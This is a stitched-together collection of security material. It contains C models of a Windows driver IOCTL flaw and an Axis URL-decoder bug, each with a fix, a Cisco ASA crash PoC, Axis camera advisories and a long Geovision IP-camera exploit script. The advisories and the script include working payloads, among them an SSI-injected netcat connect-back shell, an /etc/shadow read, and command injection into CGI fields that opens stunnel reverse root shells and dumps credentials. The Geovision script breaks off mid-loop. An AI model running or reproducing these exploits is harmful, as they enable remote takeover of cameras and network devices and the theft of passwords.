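The dispatcher ordering described in the comment inside RegisterProcessByIOCTL, modelled in user-mode C as an added example (this is not the advisory's code and not zam64.sys): the IOCTL codes 0x80002010 and 0x8000204C are the ones named above; the PID table, the PIDs used and the "only the vendor service may register others" rule in the fixed version are assumptions for illustration.

```c
/*
 * Added example, not part of the advisory or of zam64.sys: a user-mode C
 * model of the dispatcher ordering the comment in RegisterProcessByIOCTL
 * describes, next to a fixed ordering. The IOCTL codes are the ones the
 * advisory names; the PID table, the PIDs used and the "only the vendor
 * service may register others" rule in the fixed version are assumptions.
 */
#include <stdio.h>

#define IOCTL_REGISTER_PID   0x80002010u
#define IOCTL_OPEN_PROCESS   0x8000204Cu
#define STATUS_SUCCESS       0
#define STATUS_ACCESS_DENIED 1      /* stands in for 0xC0000022 */
#define MAX_REGISTERED       16

struct drv {
    unsigned registered[MAX_REGISTERED];
    int count;
    unsigned service_pid;   /* assumption: the one component allowed to vouch for others */
};

static int is_registered(const struct drv *d, unsigned pid)
{
    for (int i = 0; i < d->count; i++)
        if (d->registered[i] == pid)
            return 1;
    return 0;
}

static int add_registered(struct drv *d, unsigned pid)
{
    if (d->count >= MAX_REGISTERED)
        return 0;
    d->registered[d->count++] = pid;
    return 1;
}

typedef int (*dispatch_fn)(struct drv *, unsigned requestor, unsigned code, unsigned target);

/* Vulnerable ordering (mirrors the jz at 0000000140010553): the register
 * IOCTL skips IsProcessRegistered(requestor) entirely, so any process can
 * register itself and then use every privileged IOCTL. */
int dispatch_vulnerable(struct drv *d, unsigned requestor, unsigned code, unsigned target)
{
    if (code != IOCTL_REGISTER_PID && !is_registered(d, requestor))
        return STATUS_ACCESS_DENIED;
    switch (code) {
    case IOCTL_REGISTER_PID: return add_registered(d, target) ? STATUS_SUCCESS : STATUS_ACCESS_DENIED;
    case IOCTL_OPEN_PROCESS: return STATUS_SUCCESS;   /* driver would return a full-access handle here */
    default:                 return STATUS_ACCESS_DENIED;
    }
}

/* Fixed ordering: the privilege-granting IOCTL is itself privileged. Only
 * the trusted service may register PIDs; everything else requires the
 * requestor to be registered already. */
int dispatch_fixed(struct drv *d, unsigned requestor, unsigned code, unsigned target)
{
    if (code == IOCTL_REGISTER_PID) {
        if (requestor != d->service_pid)
            return STATUS_ACCESS_DENIED;
        return add_registered(d, target) ? STATUS_SUCCESS : STATUS_ACCESS_DENIED;
    }
    if (!is_registered(d, requestor))
        return STATUS_ACCESS_DENIED;
    return code == IOCTL_OPEN_PROCESS ? STATUS_SUCCESS : STATUS_ACCESS_DENIED;
}

/* The exploit's two stages from an unprivileged PID (assumed 1000) against
 * winlogon (assumed PID 600). Returns 1 if stage 2 succeeds. */
int attacker_gets_handle(dispatch_fn dispatch)
{
    struct drv d = { {0}, 0, 500 };
    unsigned attacker = 1000, winlogon = 600;
    dispatch(&d, attacker, IOCTL_REGISTER_PID, attacker);
    return dispatch(&d, attacker, IOCTL_OPEN_PROCESS, winlogon) == STATUS_SUCCESS;
}

/* The legitimate flow: the service (PID 500) registers its UI process (700),
 * which then opens a process. Must keep working after the fix. */
int service_flow_works(dispatch_fn dispatch)
{
    struct drv d = { {0}, 0, 500 };
    if (dispatch(&d, 500, IOCTL_REGISTER_PID, 700) != STATUS_SUCCESS)
        return 0;
    return dispatch(&d, 700, IOCTL_OPEN_PROCESS, 600) == STATUS_SUCCESS;
}

int main(void)
{
    printf("vulnerable: attacker gets handle = %d, service flow = %d\n",
           attacker_gets_handle(dispatch_vulnerable), service_flow_works(dispatch_vulnerable));
    printf("fixed     : attacker gets handle = %d, service flow = %d\n",
           attacker_gets_handle(dispatch_fixed), service_flow_works(dispatch_fixed));
    return 0;
}
```

The model fixes only the ordering bug. In a real driver the first line of defence sits one layer lower: create the device object with a restrictive security descriptor (IoCreateDeviceSecure with an SDDL string) so that non-administrators cannot open \\.\ZemanaAntiMalware at all, and then still authorize the registration IOCTL, since a DACL alone does not help once a low-privilege process inside the allowed group is compromised.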
#
# Cisco ASA CVE-2018-0101 Crash PoC
#
# We basically just read:
# https://www.nccgroup.trust/globalassets/newsroom/uk/events/2018/02/reconbrx2018-robin-hood-vs-cisco-asa.pdf
#
# @zerosum0x0, @jennamagius, @aleph___naught
#
import requests, sys
headers = {}
headers['User-Agent'] = 'Open AnyConnect VPN Agent v7.08-265-gae481214-dirty'
headers['Content-Type'] = 'application/x-www-form-urlencoded'
headers['X-Aggregate-Auth'] = '1'
headers['X-Transcend-Version'] = '1'
headers['Accept-Encoding'] = 'identity'
headers['Accept'] = '*/*'
headers['X-AnyConnect-Platform'] = 'linux-64'
headers['X-Support-HTTP-Auth'] = 'false'
headers['X-Pad'] = '0000000000000000000000000000000000000000'
xml = """<?xml version="1.0" encoding="UTF-8"?>
<config-auth client="a" type="a" aggregate-auth-version="a">
<host-scan-reply>A</host-scan-reply>
</config-auth>
"""
r = requests.post(sys.argv[1], data = xml, headers = headers, verify=False,
allow_redirects=False)
print(r.status_code)
print(r.headers)
print(r.text)
[STX]
Subject: Axis Communications MPQT/PACS Heap Overflow and Information Leakage.
Attack vector: Remote
Authentication: Anonymous (no credentials needed)
Researcher: bashis <mcw noemail eu> (August 2017)
PoC: https://github.com/mcw0/PoC
Release date: December 1, 2017
Full Disclosure: 90 days (due to the large volume of affected devices)
heap: Non-Executable + ASLR
stack: Non-Executable + ASLR
Axis Vulnerability ID: ACV-120444
Vulnerable: MPQT series < v7.20.x/6.50.1.2
Not vulnerable: MPQT series > v7.30/6.50.1.3 (Releases from September to November 2017)
Vulnerable: PACS series < v1.30.0.2/1.60.0/1.10.0.2/1.65.1
Not vulnerable (Releases from October to November 2017):
1. Information leak; All MPQT and PACS (Exist actually from v4.x Firmware)
2. Heap Overflow; MPQT and PACS with Apache Web Server (cannot be triggered with Boa Web Server)
[Note]
The best way to find a fixed FW is to check the Axis advisory and look for 'ACV-120444' in the release notes.
https://www.axis.com/global/en/support/firmware
https://www.axis.com/global/en/support/product-security
Timeline:
August 31, 2017: Initiated contact with Axis
September 1, 2017: Response from Axis
September 5, 2017: ACK of findings from Axis
September 9, 2017: Received first test image from Axis to verify fix
September 28, 2017: Received first advisory draft from Axis
November 15-27, 2017: Coordination with Axis for Full Disclosure
December 1, 2017: Full Disclosure
-[General Information]-
'CGI_decode' in /usr/lib/libcgiparser.so has a bug in its URL decoding of '%xx' sequences.
CGI_decode does not check how much input remains before decoding; it always assumes '%' is followed by two characters.
By supplying a single trailing '%', CGI_decode tries to URL decode [% + NULL + next char]: the NUL terminator and the byte after it are replaced with one '?', and copying continues until the next NULL, so the returned string is longer than expected.
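The decoder bug described above, as an added example that is not Axis code: CGI_decode in libcgiparser.so is not public, so this reimplements the behaviour the advisory describes (decode '%' plus two bytes unconditionally) next to a bounds-checked decoder. The memory image used in the demo is constructed, modelled on the "size=AAAA?http_user=..." output seen in the PoC below; function names are illustrative.

```c
/*
 * Added example, not Axis code: CGI_decode in libcgiparser.so is not
 * public, so this reimplements the behaviour the advisory describes
 * (decode '%' + two bytes unconditionally) next to a bounds-checked
 * decoder. The sample memory image below is constructed, modelled on the
 * "size=AAAA?http_user=..." output seen in the PoC.
 */
#include <stdio.h>
#include <string.h>

static int hexval(char c)
{
    if (c >= '0' && c <= '9') return c - '0';
    if (c >= 'a' && c <= 'f') return c - 'a' + 10;
    if (c >= 'A' && c <= 'F') return c - 'A' + 10;
    return -1;
}

/* Flawed: on '%' it always consumes two more bytes. When the '%' is the
 * last character, p[1] is the NUL terminator and p[2] is whatever lies
 * beyond the string; the failed escape becomes '?', the loop steps past
 * the terminator, and everything up to the next NUL is copied out (the
 * information leak). With a dst sized for the original input, that same
 * over-copy is the heap overflow. dst is bounded by max_out here only so
 * the demo itself stays memory-safe; only call it on sample_mem. */
size_t url_decode_flawed(char *dst, const char *src, size_t max_out)
{
    size_t o = 0;
    for (const char *p = src; *p != '\0' && o + 1 < max_out; p++) {
        if (*p == '%') {
            int hi = hexval(p[1]), lo = hexval(p[2]);   /* reads p[2] even if p[1] is NUL */
            dst[o++] = (hi >= 0 && lo >= 0) ? (char)(hi * 16 + lo) : '?';
            p += 2;                                     /* steps over the NUL */
        } else {
            dst[o++] = *p;
        }
    }
    dst[o] = '\0';
    return o;
}

/* Fixed: an escape is decoded only when both following bytes exist and are
 * hex digits; anything else is copied literally and the pointer never
 * advances past a terminator. */
size_t url_decode_safe(char *dst, const char *src, size_t max_out)
{
    size_t o = 0;
    const char *p = src;
    while (*p != '\0' && o + 1 < max_out) {
        if (*p == '%' && p[1] != '\0' && p[2] != '\0' &&
            hexval(p[1]) >= 0 && hexval(p[2]) >= 0) {
            dst[o++] = (char)(hexval(p[1]) * 16 + hexval(p[2]));
            p += 3;
        } else {
            dst[o++] = *p++;
        }
    }
    dst[o] = '\0';
    return o;
}

/* Constructed memory image: the query value "AAAA%" with its terminator,
 * immediately followed by unrelated data (as the adjacent CGI variables
 * were on the device). The flawed decoder runs off the end of the first
 * string into the second. */
static const char sample_mem[] = "AAAA%\0&http_user=anonymous";

const char *decode_flawed_demo(void)
{
    static char out[64];
    url_decode_flawed(out, sample_mem, sizeof out);
    return out;
}

const char *decode_safe_str(const char *src)
{
    static char out[64];
    url_decode_safe(out, src, sizeof out);
    return out;
}

int main(void)
{
    printf("flawed : \"%s\"\n", decode_flawed_demo());
    printf("fixed  : \"%s\"\n", decode_safe_str(sample_mem));
    printf("fixed  : \"%s\"\n", decode_safe_str("size=%41%"));
    return 0;
}
```

Note how the flawed output swallows the '&' that followed the terminator and replaces it with '?', which is exactly the "size=AAAA?http_user=" shape in the PoC result: the leaked bytes are whatever happened to sit after the value in memory.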
-[Information leakage]-
The "%" in "GET /index.shtml?size=%" triggers both the information disclosure and the heap overflow, depending on how the decoded result is used.
[PoC] (see the breakpoint with the 'AAAA' in the 'Result')
$ echo -en "GET /index.shtml?size=AAAA% HTTP/1.0\n\n" | ncat -v 192.168.57.20 80
[Result]
...
var completePath = "imagepath=" + encodeURIComponent(imagepath) + "&size=AAAA?http_user=anonymous&http_remote_addr=192.168.57.1&http_remote_port=44019&http_port=80&http_scheme_addr=http://http&http_protocol=http&www_authenticate_header=WWW-Authenticate:%20Digest%20realm=%22_%22,%20nonce=%22pP/WaqNeBQA=884e58ea2563f69a14215a33ca02efa68eeca126%22,%20algorithm=MD5,%20qop=%22auth%22";
...
-[Heap Overflow]-
To trigger the heap overflow we need to send ~20KB of data, which the web server would normally not accept in a request line.
The way around this is to use 'Referer:' and 'x-sessioncookie', where we can send a maximum of 8162 bytes in each.
[Note]
Without the information leakage bug above, the realloc() will never be triggered regardless of how much data is sent.
[PoC]
$ echo -en "GET /index.shtml?size=% HTTP/1.0\nReferer: `for((i=0;i<8162;i++));do echo -en "\x22";done`\nx-sessioncookie: `for((i=0;i<2157;i++));do echo -en "\x22";done`\n\n" | ncat -v 192.168.57.20 80
[Result]
/var/log/info.log
2017-05-08T08:22:23.801+00:00 axis [ INFO ] ssid[3337]: *** Error in `/bin/ssid': realloc(): invalid next size: 0x00bfda50 ***
-[Vulnerable binaries]-
/bin/ssid (Server Side Include Daemon)
/bin/urldecode (URL Command Line Tool)
/usr/bin/dynamic_overlayd (Dynamic Overlay Daemon)
/usr/bin/wsd (Web Service Dispatch Daemon)
/usr/html/axis-cgi/param.cgi (VAPIX Parameter Management)
/usr/lib/libwsevent.so
/usr/lib/libcgiparser.so (<= with the vulnerable function 'CGI_decode()', used in above binaries)
Have a nice day
/bashis
[ETX]
[STX]
Subject: SSI Remote Execute and Read Files
Researcher: bashis <mcw noemail eu> (August 2016)
Release date: October, 2017 (Old stuff that I've forgotten, fixed Q3/2016 by Axis)
Attack Vector: Remote
Authentication: Anonymous (no credentials needed)
Conditions: The camera must be configured to allow anonymous view
Execute remote commands (PoC: Connect back shell):
echo -en "GET /incl/image_test.shtml?camnbr=%3c%21--%23exec%20cmd=%22mkfifo%20/tmp/s;nc%20-w%205%20<CONNECT BACK IP>%20<CONNECT BACK PORT>%200%3C/tmp/s|/bin/sh%3E/tmp/s%202%3E/tmp/s;rm%20/tmp/s%22%20--%3e HTTP/1.0\n\n" | ncat <TARGET IP> <TARGET PORT>
Notes:
<CONNECT BACK IP> = LHOST IP
<CONNECT BACK PORT> = LHOST PORT
<TARGET IP> = RHOST IP
<TARGET PORT> = RHOST PORT
Read remote files (PoC: Read /etc/shadow - check top of the returned output):
echo -en "GET /incl/image_test.shtml?camnbr=%3c%21--%23include%20virtual=%22../../etc/shadow%22%20--%3e HTTP/1.0\n\n" | ncat <TARGET IP> <TARGET PORT>
Notes:
<TARGET IP> = RHOST IP
<TARGET PORT> = RHOST PORT
[ETX]
#!/usr/bin/env python2.7
#
# [SOF]
#
# Geovision Inc. IP Camera & Video Server Remote Command Execution PoC
# Researcher: bashis <mcw noemail eu> (November 2017)
#
###########################################################################################
#
# 1. Pop stunnel TLSv1 reverse root shell [Local listener: 'ncat -vlp <LPORT> --ssl'; Verified w/ v7.60]
# 2. Dump all settings of remote IPC with Login/Passwd in cleartext
# Using:
# - CGI: 'Usersetting.cgi' (Logged in user) < v3.12 (Very old) [Used as default]
# - CGI: 'FilterSetting.cgi' (Logged in user) < v3.12 (Very old)
# - CGI: 'PictureCatch.cgi' (Anonymous) > v3.10
# - CGI: 'JpegStream.cgi' (Anonymous) > v3.10
# 3. GeoToken PoC to login and download /etc/shadow via generated token symlink
#
# Sample reverse shell:
# $ ncat -vlp 1337 --ssl
# Ncat: Version 7.60 ( https://nmap.org/ncat )
# Ncat: Generating a temporary 1024-bit RSA key. Use --ssl-key and --ssl-cert to use a permanent one.
# Ncat: SHA-1 fingerprint: 3469 C118 43F0 043A 5168 189B 1D67 1131 4B5B 1603
# Ncat: Listening on :::1337
# Ncat: Listening on 0.0.0.0:1337
# Ncat: Connection from 192.168.57.20.
# Ncat: Connection from 192.168.57.20:16945.
# /bin/sh: can't access tty; job control turned off
# /www # id
# id
# uid=0(root) gid=0(root)
# /www # uname -a
# uname -a
# Linux IPCAM 2.6.18_pro500-davinci #1 Mon Jun 19 21:27:10 CST 2017 armv5tejl unknown
# /www # exit
# $
############################################################################################
import sys
import socket
import urllib, urllib2, httplib
import json
import hashlib
import commentjson # pip install commentjson
import xmltodict # pip install xmltodict
import select
import string
import argparse
import random
import base64
import ssl
import os
import re
#from pwn import *
def split2len(s, n):
def _f(s, n):
while s:
yield s[:n]
s = s[n:]
return list(_f(s, n))
# Ignore download of '302 Found/Location' redirections
class NoRedirection(urllib2.HTTPErrorProcessor):
def http_response(self, request, response):
return response
https_response = http_response
class HTTPconnect:
def __init__(self, host, proto, verbose, credentials, Raw, noexploit):
self.host = host
self.proto = proto
self.verbose = verbose
self.credentials = credentials
self.Raw = Raw
self.noexploit = False
self.noexploit = noexploit
def Send(self, uri, query_headers, query_data, ID):
self.uri = uri
self.query_headers = query_headers
self.query_data = query_data
self.ID = ID
# Connect-timeout in seconds
timeout = 10
socket.setdefaulttimeout(timeout)
url = '{}://{}{}'.format(self.proto, self.host, self.uri)
if self.verbose:
print "[Verbose] Sending:", url
if self.proto == 'https':
if hasattr(ssl, '_create_unverified_context'):
print "[i] Creating SSL Unverified Context"
ssl._create_default_https_context = ssl._create_unverified_context
if self.credentials:
Basic_Auth = self.credentials.split(':')
if self.verbose:
print "[Verbose] User:",Basic_Auth[0],"password:",Basic_Auth[1]
try:
pwd_mgr = urllib2.HTTPPasswordMgrWithDefaultRealm()
pwd_mgr.add_password(None, url, Basic_Auth[0], Basic_Auth[1])
auth_handler = urllib2.HTTPBasicAuthHandler(pwd_mgr)
if self.verbose:
http_logger = urllib2.HTTPHandler(debuglevel = 1) # HTTPSHandler... for HTTPS
opener = urllib2.build_opener(auth_handler,NoRedirection,http_logger)
else:
opener = urllib2.build_opener(auth_handler,NoRedirection)
urllib2.install_opener(opener)
except Exception as e:
print "[!] Basic Auth Error:",e
sys.exit(1)
else:
# Don't follow redirects!
if self.verbose:
http_logger = urllib2.HTTPHandler(debuglevel = 1)
opener = urllib2.build_opener(http_logger,NoRedirection)
urllib2.install_opener(opener)
else:
NoRedir = urllib2.build_opener(NoRedirection)
urllib2.install_opener(NoRedir)
if self.noexploit and not self.verbose:
print "[<] 204 Not Sending!"
html = "Not sending any data"
return html
else:
if self.query_data:
req = urllib2.Request(url, data=urllib.urlencode(self.query_data,doseq=True), headers=self.query_headers)
if self.ID:
Cookie = 'CLIENT_ID={}'.format(self.ID)
req.add_header('Cookie', Cookie)
else:
req = urllib2.Request(url, None, headers=self.query_headers)
if self.ID:
Cookie = 'CLIENT_ID={}'.format(self.ID)
req.add_header('Cookie', Cookie)
rsp = urllib2.urlopen(req)
if rsp:
print "[<] {}".format(rsp.code)
if self.Raw:
return rsp
else:
html = rsp.read()
return html
#
# Validate correctness of HOST, IP and PORT
#
class Validate:
def __init__(self,verbose):
self.verbose = verbose
# Check if IP is valid
def CheckIP(self,IP):
self.IP = IP
ip = self.IP.split('.')
if len(ip) != 4:
return False
for tmp in ip:
if not tmp.isdigit():
return False
i = int(tmp)
if i < 0 or i > 255:
return False
return True
# Check if PORT is valid
def Port(self,PORT):
self.PORT = PORT
if int(self.PORT) < 1 or int(self.PORT) > 65535:
return False
else:
return True
# Check if HOST is valid
def Host(self,HOST):
self.HOST = HOST
try:
# Check valid IP
socket.inet_aton(self.HOST) # Will generate exeption if we try with DNS or invalid IP
# Now we check if it is correct typed IP
if self.CheckIP(self.HOST):
return self.HOST
else:
return False
except socket.error as e:
# Else check valid DNS name, and use the IP address
try:
self.HOST = socket.gethostbyname(self.HOST)
return self.HOST
except socket.error as e:
return False
class Geovision:
def __init__(self, rhost, proto, verbose, credentials, raw_request, noexploit, headers, SessionID):
self.rhost = rhost
self.proto = proto
self.verbose = verbose
self.credentials = credentials
self.raw_request = raw_request
self.noexploit = noexploit
self.headers = headers
self.SessionID = SessionID
def Login(self):
try:
print "[>] Requesting keys from remote"
URI = '/ssi.cgi/Login.htm'
response = HTTPconnect(self.rhost,self.proto,self.verbose,self.credentials,self.raw_request,self.noexploit).Send(URI,self.headers,None,None)
response = response.read()[:1500]
response = re.split('[()<>?"\n_&;/ ]',response)
# print response
except Exception as e:
print "[!] Can't access remote host... ({})".format(e)
sys.exit(1)
try:
#
# Geovision way to have MD5 random Login and Password
#
CC1 = ''
CC2 = ''
for check in range(0,len(response)):
if response[check] == 'cc1=':
CC1 = response[check+1]
print "[i] Random key CC1: {}".format(response[check+1])
elif response[check] == 'cc2=':
CC2 = response[check+1]
print "[i] Random key CC2: {}".format(response[check+1])
"""
#
# Less interesting to know, but leave it here anyway.
#
# If the remote server has enabled guest view, these below will not be '0'
elif response[check] == 'GuestIdentify':
print "[i] GuestIdentify: {}".format(response[check+2])
elif response[check] == 'uid':
if response[check+2]:
print "[i] uid: {}".format(response[check+2])
else:
print "[i] uid: {}".format(response[check+3])
elif response[check] == 'pid':
if response[check+2]:
print "[i] pid: {}".format(response[check+2])
else:
print "[i] pid: {}".format(response[check+3])
"""
if not CC1 and not CC2:
print "[!] CC1 and CC2 missing!"
print "[!] Cannot generate MD5, exiting.."
sys.exit(0)
#
# Geovision MD5 Format
#
uMD5 = hashlib.md5(CC1 + username + CC2).hexdigest().upper()
pMD5 = hashlib.md5(CC2 + password + CC1).hexdigest().upper()
# print "[i] User MD5: {}".format(uMD5)
# print "[i] Pass MD5: {}".format(pMD5)
self.query_args = {
"username":"",
"password":"",
"Apply":"Apply",
"umd5":uMD5,
"pmd5":pMD5,
"browser":1,
"is_check_OCX_OK":0
}
print "[>] Logging in"
URI = '/LoginPC.cgi'
response = HTTPconnect(self.rhost,self.proto,self.verbose,self.credentials,self.raw_request,self.noexploit).Send(URI,self.headers,self.query_args,self.SessionID)
# print response.info()
# if we don't get 'Set-Cookie' back from the server, the Login has failed
if not (response.info().get('Set-Cookie')):
print "[!] Login Failed!"
sys.exit(1)
if self.verbose:
print "Cookie: {}".format(response.info().get('Set-Cookie'))
return response.info().get('Set-Cookie')
except Exception as e:
print "[i] What happen? ({})".format(e)
exit(0)
def DeviceInfo(self):
try:
URI = '/PSIA/System/deviceInfo'
response = HTTPconnect(self.rhost,self.proto,self.verbose,self.credentials,False,self.noexploit).Send(URI,self.headers,None,None)
deviceinfo = xmltodict.parse(response)
print "[i] Remote target: {} ({})".format(deviceinfo['DeviceInfo']['model'],deviceinfo['DeviceInfo']['firmwareVersion'])
return True
except Exception as e:
print "[i] Info about remote target failed ({})".format(e)
return False
def UserSetting(self,DumpSettings):
self.DumpSettings = DumpSettings
if self.DumpSettings:
print "[i] Dump Config of remote"
SH_CMD = '`echo "<!--#include file="SYS_CFG"-->" >/var/www/tmp/Login.htm`'
else:
print "[i] Launching TLSv1 privacy reverse shell"
self.headers = {
'Connection': 'close',
'Accept-Language' : 'en-US,en;q=0.8',
'Cache-Control' : 'max-age=0',
'User-Agent':'Mozilla',
'Accept':'client=yes\\x0apty=yes\\x0asslVersion=TLSv1\\x0aexec=/bin/sh\\x0a'
}
SH_CMD = ';echo -en \"$HTTP_ACCEPT connect=LHOST:LPORT\"|stunnel -fd 0;'
SH_CMD = SH_CMD.replace("LHOST",lhost)
        SH_CMD = SH_CMD.replace("LPORT",lport)
        print "[>] Pwning Usersetting.cgi"
        self.query_args = {
            "umd5":SH_CMD,
            "pmd5":"GEOVISION",
            "nmd5":"PWNED",
            "cnt5":"",
            "username":"",
            "passwordOld":"",
            "passwordNew":"",
            "passwordRetype":"",
            "btnSubmitAdmin":"1",
            "submit":"Apply"
        }
        try:
            URI = '/UserSetting.cgi'
            response = HTTPconnect(self.rhost,self.proto,self.verbose,self.credentials,self.raw_request,self.noexploit).Send(URI,self.headers,self.query_args,self.SessionID)
            if DumpSettings:
                print "[i] Dumping"
                URI = '/ssi.cgi/tmp/Login.htm'
                response = HTTPconnect(self.rhost,self.proto,self.verbose,self.credentials,False,self.noexploit).Send(URI,self.headers,None,self.SessionID)
                print response
            return True
        except Exception as e:
            if str(e) == "timed out" or str(e) == "('The read operation timed out',)":
                print "[!] Enjoy the shell... ({})".format(e)
                return True

    def PictureCatch(self,DumpSettings):
        self.DumpSettings = DumpSettings
        if self.DumpSettings:
            print "[i] Dump Config of remote"
            SH_CMD = '`echo "<!--#include file="SYS_CFG"-->" >/var/www/tmp/Login.htm`'
        else:
            print "[i] Launching TLSv1 privacy reverse shell"
            self.headers = {
                'Connection': 'close',
                'Accept-Language' : 'en-US,en;q=0.8',
                'Cache-Control' : 'max-age=0',
                'User-Agent':'Mozilla',
                'Accept':'client=yes\\x0apty=yes\\x0asslVersion=TLSv1\\x0aexec=/bin/sh\\x0a'
            }
            SH_CMD = ';echo -en \"$HTTP_ACCEPT connect=LHOST:LPORT\"|stunnel -fd 0;'
        SH_CMD = SH_CMD.replace("LHOST",lhost)
        SH_CMD = SH_CMD.replace("LPORT",lport)
        print "[>] Pwning PictureCatch.cgi"
        self.query_args = {
            "username":SH_CMD,
            "password":"GEOVISION",
            "attachment":"1",
            "channel":"1",
            "secret":"1",
            "key":"PWNED"
        }
        try:
            URI = '/PictureCatch.cgi'
            response = HTTPconnect(self.rhost,self.proto,self.verbose,self.credentials,self.raw_request,self.noexploit).Send(URI,self.headers,self.query_args,self.SessionID)
            if DumpSettings:
                print "[i] Dumping"
                URI = '/ssi.cgi/tmp/Login.htm'
                response = HTTPconnect(self.rhost,self.proto,self.verbose,self.credentials,False,self.noexploit).Send(URI,self.headers,None,self.SessionID)
                print response
            return True
        except Exception as e:
            if str(e) == "timed out" or str(e) == "('The read operation timed out',)":
                print "[!] Enjoy the shell... ({})".format(e)
                return True

    def JpegStream(self,DumpSettings):
        self.DumpSettings = DumpSettings
        if self.DumpSettings:
            print "[i] Dump Config of remote"
            SH_CMD = '`echo "<!--#include file="SYS_CFG"-->" >/var/www/tmp/Login.htm`'
        else:
            print "[i] Launching TLSv1 privacy reverse shell"
            self.headers = {
                'Connection': 'close',
                'Accept-Language' : 'en-US,en;q=0.8',
                'Cache-Control' : 'max-age=0',
                'User-Agent':'Mozilla',
                'Accept':'client=yes\\x0apty=yes\\x0asslVersion=TLSv1\\x0aexec=/bin/sh\\x0a'
            }
            SH_CMD = ';echo -en \"$HTTP_ACCEPT connect=LHOST:LPORT\"|stunnel -fd 0;'
        SH_CMD = SH_CMD.replace("LHOST",lhost)
        SH_CMD = SH_CMD.replace("LPORT",lport)
        print "[>] Pwning JpegStream.cgi"
        self.query_args = {
            "username":SH_CMD,
            "password":"GEOVISION",
            "attachment":"1",
            "channel":"1",
            "secret":"1",
            "key":"PWNED"
        }
        try:
            URI = '/JpegStream.cgi'
            response = HTTPconnect(self.rhost,self.proto,self.verbose,self.credentials,self.raw_request,self.noexploit).Send(URI,self.headers,self.query_args,self.SessionID)
            if DumpSettings:
                print "[i] Dumping"
                URI = '/ssi.cgi/tmp/Login.htm'
                response = HTTPconnect(self.rhost,self.proto,self.verbose,self.credentials,False,self.noexploit).Send(URI,self.headers,None,self.SessionID)
                print response
            return True
        except Exception as e:
            if str(e) == "timed out" or str(e) == "('The read operation timed out',)":
                print "[!] Enjoy the shell... ({})".format(e)
                return True

    #
    # Interesting example of bad code and insufficient sanitation of user input.
    # ';' is filtered in v3.12, and when found in the packet, the packet is simply ignored.
    #
    # Later in the chain the Geovision code will write the provided user input to flash; we may overwrite an unwanted flash area if we play too much here.
    # So, we are limited to 31 chars per line (the 32nd MUST BE NULL) to play a safe game with this bug.
    #
    # v3.10->3.12 changed how to handle ipfilter
    # From:
    # User input to system() call in FilterSetting.cgi to set iptable rules and then save them in flash
    # To:
    # User input transferred from 'FilterSetting.cgi' to flash (/dev/mtd11), and when the tickbox to activate the filter rules is set,
    # '/usr/local/bin/geobox-iptables-reload' is triggered to read these rules from flash and call '/usr/local/bin/iptables' via 'geo_net_filter_table_add'
    # with a system() call in 'libgeo_net.so'
    #
    # Should end up into;
    # 23835 root 576 S sh -c /usr/local/bin/iptables -A INPUT -s `/usr/loca...[truncated]
    # 23836 root 2428 S /usr/local/bin/stunnel /tmp/x
    # 23837 root 824 S /bin/sh
    def FilterSetting(self):
        try:
            print "[>] Pwning FilterSetting.cgi"
            #
            # ';' will be treated by the code as LF
            #
            # Let's use some TLSv1 privacy for the reverse shell
            #
            SH_CMD = 'client=yes;connect=LHOST:LPORT;exec=/bin/sh;pty=yes;sslVersion=TLSv1'
            #
            SH_CMD = SH_CMD.replace("LHOST",lhost)
            SH_CMD = SH_CMD.replace("LPORT",lport)
            ShDict = SH_CMD.split(';')
            MAX_SIZE = 31 # Max Size of the strings to generate
            LF = 0
            LINE = 0
            CMD = {}
            CMD_NO_LF = "`echo -n \"TMP\">>/tmp/x`"
            CMD_DO_LF = "`echo \"TMP\">>/tmp/x`"
            SIZE = MAX_SIZE-(len(CMD_NO_LF)-3) # Size of available space for our input in 'SH_CMD'
            # Remove, just in case
            CMD[LINE] = "`rm -f /tmp/x`"
            URI = '/FilterSetting.cgi'
            #
            # This loop will make the correct alignment of user input
            #
            for cmd in range(0,len(ShDict)):
                CMD_LF = math.ceil(float(len(ShDict[cmd])) / SIZE)
                cmd_split = split2len(ShDict[cmd], SIZE)
                for CMD_LEN in range(0,len(cmd_split)):
                    LINE += 1
                    LF += 1
                    if (len(cmd_split[CMD_LEN]) > SIZE-1) and (CMD_LF != LF):
                        CMD[LINE] = CMD_NO_LF.replace("TMP",cmd_split[CMD_LEN])
                    else:
                        CMD[LINE] = CMD_DO_LF.replace("TMP",cmd_split[CMD_LEN])
                        LF = 0
                    if verbose:
                        print "Len: {} {}".format(len(CMD[LINE]),CMD[LINE])
            # Add two more commands to execute stunnel and remove /tmp/x
            CMD[LINE+1] = "`/usr/local/bin/stunnel /tmp/x`" # 31 char, no /usr/local/bin in $PATH
            CMD[LINE+2] = "`rm -f /tmp/x`" # Some bug here, think it is timing as below working
            CMD[LINE+3] = "`rm -f /tmp/x`" # Working, this is only one more add/enable/disable/remove loop
            #
            # Below while() loop will create following /tmp/x, execute 'stunnel' and remove /tmp/x
            #
            # client=yes
            # connect=<LHOST>:<LPORT>
            # exec=/bin/sh
            # pty=yes
            # sslVersion=TLSv1
            #
            NEW_IP_FILTER = 1 # > v3.12
            CMD_LEN = 0
            who = 0
            # Clean up to make room, just in case
            for Remove in range(0,4):
                print "[>] Cleaning ipfilter entry: {}".format(Remove+1)
                self.query_args = {
                    "bPolicy":"0", # 1 = Enable, 0 = Disable
                    "Delete":"Remove", # Remove entry
                    "szIpAddr":"",
                    "byOpId":"0", # 0 = Allow, 1 = Deny
                    "dwSelIndex":"0",
                }
                response = HTTPconnect(self.rhost,self.proto,self.verbose,self.credentials,self.raw_request,self.noexploit).Send(URI,self.headers,self.query_args,self.SessionID)
            while True:
                if who == len(CMD):
                    break
                if CMD_LEN < 4:
                    print "[>] Sending: {} ({})".format(CMD[who],len(CMD[who]))
                    self.query_args = {
                        "szIpAddr":CMD[who], # 31 char limit
                        "byOpId":"0", # 0 = Allow, 1 = Deny
                        "dwSelIndex":"0", # Seems not to be in use
                        "Add":"Apply"
                    }
                    response = HTTPconnect(self.rhost,self.proto,self.verbose,self.credentials,False,self.noexploit).Send(URI,self.headers,self.query_args,self.SessionID)
                    response = re.split('[()<>?"\n_&;/ ]',response)
                    print response
                    if NEW_IP_FILTER:
                        for cnt in range(0,len(response)):
                            if response[cnt] == 'iptables':
                                NEW_IP_FILTER = 0
                                print "[i] Remote don't need Enable/Disable"
                                break
                    CMD_LEN += 1
                    who += 1
                    time.sleep(2) # Seems to be too fast without
                # NEW Way
                elif NEW_IP_FILTER:
                    print "[>] Enabling ipfilter"
                    self.query_args = {
                        "bPolicy":"1", # 1 = Enable, 0 = Disable
                        "szIpAddr":"",
                        "byOpId":"0", # 0 = Allow, 1 = Deny
                        "dwSelIndex":"0",
                    }
